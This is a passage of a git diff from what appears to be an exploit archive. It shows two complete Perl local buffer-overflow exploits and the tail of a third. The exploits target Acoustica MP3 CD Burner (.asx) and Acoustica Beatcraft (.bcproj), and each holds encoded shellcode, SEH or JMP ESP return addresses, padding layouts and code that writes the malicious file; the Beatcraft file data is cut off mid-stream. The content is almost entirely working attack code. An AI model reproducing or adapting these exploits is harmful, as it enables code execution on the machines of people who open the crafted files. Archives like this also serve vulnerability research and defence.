+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x01\x00\x00\x46\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x49\x53\x54\x04\x00\x00\x00".
+	"\x45\x66\x78\x4C";
+
+open (MYFILE, '>>Exploit.mx4');
+binmode(MYFILE);
+print MYFILE "$tuff";
+close (MYFILE);
+print "Exploit file has been created. ( Exploit.mx4 )\n";
+
+# milw0rm.com [2008-08-28]
diff --git a/platforms/windows/local/6329.pl b/platforms/windows/local/6329.pl
index 2d1cd521f..f2f9484a3 100755
--- a/platforms/windows/local/6329.pl
+++ b/platforms/windows/local/6329.pl
@@ -1,65 +1,65 @@
-#!/usr/bin/perl
-#
-# Acoustica MP3 CD Burner (asx file) Local BOF Exploit
-# Author: Koshi
-#
-# Date: 08-29-08 ( 0day )
-# Application: Acoustica MP3 CD Burner
-# Version: 4.51 Build 147 ( possibly older )
-# Site: http://acoustica.com/download.htm
-# Tested On: Windows XP SP3 Fully Patched
-#
-# Based off of n00b's findings http://www.milw0rm.com/exploits/4017
-# gr33tz: Rima my baby, str0ke, n00b ( nice find )
-
-
-# win32_exec -  EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
-"\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x66".
-"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x76\x42\x32\x42\x41\x32".
-"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x49\x79\x4b\x4c\x4d".
-"\x38\x43\x74\x67\x70\x63\x30\x67\x70\x4c\x4b\x41\x55\x37\x4c\x6c".
-"\x4b\x41\x6c\x73\x35\x53\x48\x64\x41\x4a\x4f\x6c\x4b\x70\x4f\x67".
-"\x68\x6c\x4b\x41\x4f\x57\x50\x45\x51\x5a\x4b\x53\x79\x4e\x6b\x74".
-"\x74\x6c\x4b\x76\x61\x38\x6e\x64\x71\x59\x50\x6e\x79\x4e\x4c\x6b".
-"\x34\x79\x50\x63\x44\x73\x37\x4a\x61\x69\x5a\x44\x4d\x76\x61\x6b".
-"\x72\x7a\x4b\x4b\x44\x35\x6b\x50\x54\x77\x54\x65\x54\x71\x65\x4d".
-"\x35\x6e\x6b\x61\x4f\x64\x64\x65\x51\x7a\x4b\x63\x56\x4c\x4b\x56".
-"\x6c\x50\x4b\x4e\x6b\x43\x6f\x47\x6c\x65\x51\x6a\x4b\x6c\x4b\x55".
-"\x4c\x6c\x4b\x64\x41\x68\x6b\x6d\x59\x63\x6c\x45\x74\x75\x54\x59".
-"\x53\x36\x51\x4b\x70\x71\x74\x6e\x6b\x67\x30\x30\x30\x6f\x75\x6b".
-"\x70\x30\x78\x64\x4c\x4c\x4b\x37\x30\x44\x4c\x6e\x6b\x54\x30\x47".
-"\x6c\x6e\x4d\x6e\x6b\x53\x58\x75\x58\x6a\x4b\x76\x69\x4e\x6b\x6b".
-"\x30\x6c\x70\x37\x70\x47\x70\x35\x50\x4c\x4b\x50\x68\x57\x4c\x51".
-"\x4f\x35\x61\x6c\x36\x63\x50\x52\x76\x4f\x79\x6c\x38\x6b\x33\x6f".
-"\x30\x31\x6b\x36\x30\x33\x58\x73\x4e\x69\x48\x6b\x52\x44\x33\x55".
-"\x38\x6d\x48\x4b\x4e\x4d\x5a\x74\x4e\x50\x57\x4b\x4f\x48\x67\x71".
-"\x73\x62\x41\x32\x4c\x45\x33\x56\x4e\x55\x35\x61\x68\x31\x75\x75".
-"\x50\x66";
-
-my $bof = "A"x480;
-my $led = "\x90"x35;
-my $fill = "\x90"x150;
-my $buff = "".
-	   "$bof".
-	   "\xeb\x06\x90\x90". ### Pointer to next SEH record			   ###
-	   "\x65\x82\x19\x01". ### SE handler wmaengine.dll POP POP RET 0x01198265 ###
-	   "$led".
-	   "$shellcode".
-	   "$fill";
-
-my $tuff = "".
-	   "\n".
-	   "Acoustica MP3 CD Burner Local BOF Exploit\n".
-	   "\n\n";
-
-open (MYFILE, '>>Exploit.asx');
-binmode(MYFILE);
-print MYFILE "$tuff";
-close (MYFILE);
-print "Exploit file has been created. ( Exploit.asx )\n";
-
-# milw0rm.com [2008-08-29]
+#!/usr/bin/perl
+#
+# Acoustica MP3 CD Burner (asx file) Local BOF Exploit
+# Author: Koshi
+#
+# Date: 08-29-08 ( 0day )
+# Application: Acoustica MP3 CD Burner
+# Version: 4.51 Build 147 ( possibly older )
+# Site: http://acoustica.com/download.htm
+# Tested On: Windows XP SP3 Fully Patched
+#
+# Based off of n00b's findings http://www.milw0rm.com/exploits/4017
+# gr33tz: Rima my baby, str0ke, n00b ( nice find )
+
+
+# win32_exec -  EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
+"\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x66".
+"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x76\x42\x32\x42\x41\x32".
+"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x49\x79\x4b\x4c\x4d".
+"\x38\x43\x74\x67\x70\x63\x30\x67\x70\x4c\x4b\x41\x55\x37\x4c\x6c".
+"\x4b\x41\x6c\x73\x35\x53\x48\x64\x41\x4a\x4f\x6c\x4b\x70\x4f\x67".
+"\x68\x6c\x4b\x41\x4f\x57\x50\x45\x51\x5a\x4b\x53\x79\x4e\x6b\x74".
+"\x74\x6c\x4b\x76\x61\x38\x6e\x64\x71\x59\x50\x6e\x79\x4e\x4c\x6b".
+"\x34\x79\x50\x63\x44\x73\x37\x4a\x61\x69\x5a\x44\x4d\x76\x61\x6b".
+"\x72\x7a\x4b\x4b\x44\x35\x6b\x50\x54\x77\x54\x65\x54\x71\x65\x4d".
+"\x35\x6e\x6b\x61\x4f\x64\x64\x65\x51\x7a\x4b\x63\x56\x4c\x4b\x56".
+"\x6c\x50\x4b\x4e\x6b\x43\x6f\x47\x6c\x65\x51\x6a\x4b\x6c\x4b\x55".
+"\x4c\x6c\x4b\x64\x41\x68\x6b\x6d\x59\x63\x6c\x45\x74\x75\x54\x59".
+"\x53\x36\x51\x4b\x70\x71\x74\x6e\x6b\x67\x30\x30\x30\x6f\x75\x6b".
+"\x70\x30\x78\x64\x4c\x4c\x4b\x37\x30\x44\x4c\x6e\x6b\x54\x30\x47".
+"\x6c\x6e\x4d\x6e\x6b\x53\x58\x75\x58\x6a\x4b\x76\x69\x4e\x6b\x6b".
+"\x30\x6c\x70\x37\x70\x47\x70\x35\x50\x4c\x4b\x50\x68\x57\x4c\x51".
+"\x4f\x35\x61\x6c\x36\x63\x50\x52\x76\x4f\x79\x6c\x38\x6b\x33\x6f".
+"\x30\x31\x6b\x36\x30\x33\x58\x73\x4e\x69\x48\x6b\x52\x44\x33\x55".
+"\x38\x6d\x48\x4b\x4e\x4d\x5a\x74\x4e\x50\x57\x4b\x4f\x48\x67\x71".
+"\x73\x62\x41\x32\x4c\x45\x33\x56\x4e\x55\x35\x61\x68\x31\x75\x75".
+"\x50\x66";
+
+my $bof = "A"x480;
+my $led = "\x90"x35;
+my $fill = "\x90"x150;
+my $buff = "".
+	   "$bof".
+	   "\xeb\x06\x90\x90". ### Pointer to next SEH record			   ###
+	   "\x65\x82\x19\x01". ### SE handler wmaengine.dll POP POP RET 0x01198265 ###
+	   "$led".
+	   "$shellcode".
+	   "$fill";
+
+my $tuff = "".
+	   "\n".
+	   "Acoustica MP3 CD Burner Local BOF Exploit\n".
+	   "\n\n";
+
+open (MYFILE, '>>Exploit.asx');
+binmode(MYFILE);
+print MYFILE "$tuff";
+close (MYFILE);
+print "Exploit file has been created. ( Exploit.asx )\n";
+
+# milw0rm.com [2008-08-29]
diff --git a/platforms/windows/local/6333.pl b/platforms/windows/local/6333.pl
index 35d034a6b..e0e032619 100755
--- a/platforms/windows/local/6333.pl
+++ b/platforms/windows/local/6333.pl
@@ -1,263 +1,263 @@
-#!/usr/bin/perl
-#
-# Acoustica Beatcraft (bcproj file) Local BOF Exploit
-# Author: Koshi
-#
-# Date: 08-30-08 ( 0day )
-# Application: Acoustica Beatcraft
-# Version(s): v1.02 Build 19
-# Site: http://acoustica.com/beatcraft/index.htm
-# Tested On: Windows XP SP3 Fully Patched
-#
-# Acoustica Beatcraft contains a buffer prone to exploitation via an
-# overly long string. The buffer contains the "title" of the "instruments"
-# one can insert into a Beatcraft project. This exploit is a bit
-# unstable in the fact that, to properly exploit it, one must open
-# Beatcraft firstly, then proceed to open the exploit file from
-# within Beatcraft. Simply double clicking the file will result
-# in a simple DoS scenario. ( Hopefully I'll fix this soon )
-# My guess as of now is we're not going to have it both ways.
-#
-# gr33tz: Rima my baby, str0ke, breaker_unit, mess'
-#
-
-
-# win32_exec -  EXITFUNC=process CMD=calc.exe Size=165 Encoder=ShikataGaNai http://metasploit.com
-my $shellcode =
-"\xdd\xc3\xd9\x74\x24\xf4\x5b\x29\xc9\xb8\x1f\xb4\xe6\x18\xb1\x24".
-"\x83\xeb\xfc\x31\x43\x13\x03\x5c\xa7\x04\xed\x9e\x2f\x8c\x0e\x5e".
-"\xb0\x86\x4a\x62\x3b\xe4\x51\xe2\x3a\xfa\xd1\x5d\x25\x8f\xb9\x41".
-"\x54\x64\x0c\x0a\x62\xf1\x8e\xe2\xba\xc5\x08\x56\x38\x05\x5e\xa1".
-"\x80\x4c\x92\xac\xc0\xba\x59\x95\x90\x18\xa6\x9c\xfd\xea\xf9\x7a".
-"\xff\x07\x63\x09\xf3\x9c\xe7\x52\x10\x22\x13\xe7\x34\xaf\xe2\x1c".
-"\xcd\xf3\xc0\xe6\x0d\x3a\xc9\x82\x1a\x7d\xf9\xcf\xdd\x06\xf5\x44".
-"\x9d\xfa\x8e\x2a\x02\xae\x1a\xa2\x32\x5b\x15\xb9\xc3\x2b\x26\xbd".
-"\xc3\xc0\x4f\x81\x9c\xe7\x79\x99\x74\x81\x7e\xda\xb9\xea\x2e\xb4".
-"\x47\xd5\x2d\x37\xd0\x7d\x4f\x3d\x2e\x29\x4f\xa6\x4c\xb4\xc3\x4b".
-"\xbd\x53\x64\xee\xc1";
-
-my $led1 = "A"x110;	# Sled ( \x41 INC ECX )
-my $led2 = "A"x34;	# Sled ( \x41 INC ECX )
-my $buf1 = "A"x179;	# Overflow
-
-my $buff = "".
-	"$buf1".	    # Overflowage...
-	"$led1".	    # Slide on down to the jump
-	"\xeb\x07".	    # Jump NTDLL address
-	"\xed\x1e\x94\x7c". # NTDLL.DLL JMP ESP ( This may need to be changed to a different JMP ESP )
-	"\xeb\x31".	    # Line it up right and land into the sled
-	"$led2".	    # Slip on down to the shellcode
-	"$shellcode";	    # ..to the beat of a different drum.
-
-my $tuff = "".
-	"\x52\x49\x46\x46\xB0\x0F\x00\x00\x62\x65\x61\x74\x62\x70\x72\x6F\x30\x02\x00\x00".
-	"\xCD\xCC\x8C\x3F\x43\x3A\x5C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73\x20\x61\x6E\x64".
-	"\x20\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x4F\x77\x6E\x65\x72\x5C\x44\x65\x73\x6B".
-	"\x74\x6F\x70\x5C\x70\x6F\x63\x2E\x62\x63\x70\x72\x6F\x6A\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x64\x00\x00\x00\x64\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00".
-	"\x62\x6B\x69\x74\x98\x01\x00\x00\x00\x00\x80\x3F\xE8\x2B\x56\x13\x9F\x06\xB1\x4F".
-	"\xB8\x24\x65\xE5\x00\xAB\xB8\xA7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x62\x74\x72\x61".
-	"\x28\x00\x00\x00\xCD\xCC\x8C\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x62\x73\x61\x6D\x9C\x02\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"$buff".
-	"\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x62\x70\x61\x74\xA8\x01\x00\x00\x00\x00\x80\x3F".
-	"\x3C\xF3\x4B\x37\x40\x30\xEC\x4E\xA3\xD7\xB3\x2C\x48\x84\xE5\xAC\x01\x00\x00\x00".
-	"\x04\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
-	"\x62\x73\x73\x65\x0C\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x10\x00\x00\x00".
-	"\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00".
-	"\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00".
-	"\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00".
-	"\x00\x00\xB0\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00".
-	"\x02\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F".
-	"\x00\x00\x00\x00\x00\x00\xC0\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00".
-	"\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x03\x00\x00\x00\x03\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xC8\x3F\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65".
-	"\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x01\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00".
-	"\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xD0\x3F\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
